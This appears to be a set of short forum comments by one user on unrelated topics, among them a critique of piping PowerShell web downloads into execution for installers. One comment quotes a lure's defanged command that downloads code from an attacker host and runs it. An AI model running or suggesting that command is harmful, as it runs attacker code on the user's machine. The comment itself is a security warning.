  • Oh no!

  • I guess Football really is his life.

  • Jumping over to the original report:

While the canonical command is “irm https[:]//claude[.]ai/install.ps1 | iex”, the lure replaced the destination host with “irm events[.]msft23[.]com | iex”.

Whatever artificially intelligent person at Anthopic decided that the official install method for Claude Code should be an irm piped to an iex in PowerShelll should be dragged out behind the same woodshed as Old Yeller. That is basically screaming "malicious code" at security tools. And it's training developers that blindly running code from the internet is a-ok. It's no wonder I've already seen exactly this sort of thing (with a different URL) happen in my environment. It's like the AI companies are trying to make security worse.

  • GM is also required to:

    • Stop selling driving data to consumer reporting agencies and brokers for five years.

Stop doing that until everyone forgets about it and we can go back to turning a blind eye.

  • Mens Rea

If you want to dig deeper, law school might be for you.

  • Don't feed the trolls. It's a rule almost as old as the intranet. It doesn't work, but there isn't anything better.

  • eno seod ton ylpmis daer siht sdrawkcab

    Ya, you got that right!

  • It all depends on conditions. If there's lightning, it's time to get out. If the rain is riding on cold air, probably gonna get out, cold water isn't fun. Warm rain with no lightning, who cares keep swimming. Also, windy conditions (which often accompany rain) while at the ocean can cause strong waves and riptides, that might warrant caution or getting out.

  • I was at a showing of Monty Python and the Holy Grail in a theater over the weekend. I was originally worried we'd have trouble getting tickets. Turns out there were only 10 people in the theater and half of those were in my group. What sad times we live in when there aren't enough people saying, "Ni" in a theater.

  • False positives out of Defender?I'm shocked I tell you, shocked.Well, not that shocked.

  • They do use a good bit of filament, but I really like the look of them. I'm a bit of a sucker for geometric designs.

  • People need to remember that Microsoft now owns Bethesda. You need to apply the same "every other version is good" mentality to their releases. So:

    • Oblivion - pretty good
    • Oblivion Remastered - shite
    • Whatever they decide to call the next release of Oblivion - pretty good

Of course, these days I'd just expect the to release Copilot for Oblivion and call it a day.

  • LinkedIn is basically a public resume. Using it for anything more demonstrates that you do not have a basic grasp of privacy or security. As such, there shouldn't be anything up there which is all that bad to have leaked. Sure, if the password database gets dumped, rotate your LinkedIn password (it should already be unique, so no worries about it being reused elsewhere). And having an email address get added to every spam list everywhere kinda sucks. But, what else is the attacker going to get, my name and work history, which are already public on the site?

I mean, yes LinkedIn should be raked over the coals for shit security practices. And we really need something like the GDPR here in the US to actually do that. But, I'm also not going to get terribly worked up about my public CV being leaked. The leak is kinda redundant.

  • I've been using these prints (not my design) on mason jars for a few years to grow various plands using the kratky method. My most successful plants have been basil, though I did have some bell peppers happily growing in these for a while.

  • The same place they came from.

  • "I think we need an exit strategy," [Republican Sen. Josh Hawley of Missouri] said on April 15.

A strategy at all would have been nice. But, Trump is just going to ignore the deadline, maybe even throw up a bullshit smokescreen of legal arguments which make as much sense as pissing up a rope and keep doing exactly what he wants to do. Congressional Republicans will wring their hands and claim there is nothing to be done, Democrats will keep sponsoring resolutions to "force Republicans to vote on the issue" but which ultimately do nothing (in fairness, as the party out of power, they can't do much more). And maybe we'll get a court challenge of some sort. Though, I expect the pack of monkeys in black robes will opt out of ruling by claiming that Congress has the power to reign in the President, and it's therefore a political question. Which is probably technically right, but leaves us with greatly expanded Presidential powers, as a not-hostile Congress now means that the President can run wars with no meaningful checks on that power.

  • An IP ban also created the risk of banning others unintentionally. ISPs which use CGNAT will have a large number of users coming from the same IP address. So, banning one IP could ban a large number of users.

  • I generally love crafting survival games, but I find Minecraft boring. I still play it from time to time, because my daughter loves it. But, it's not something I play on my own.
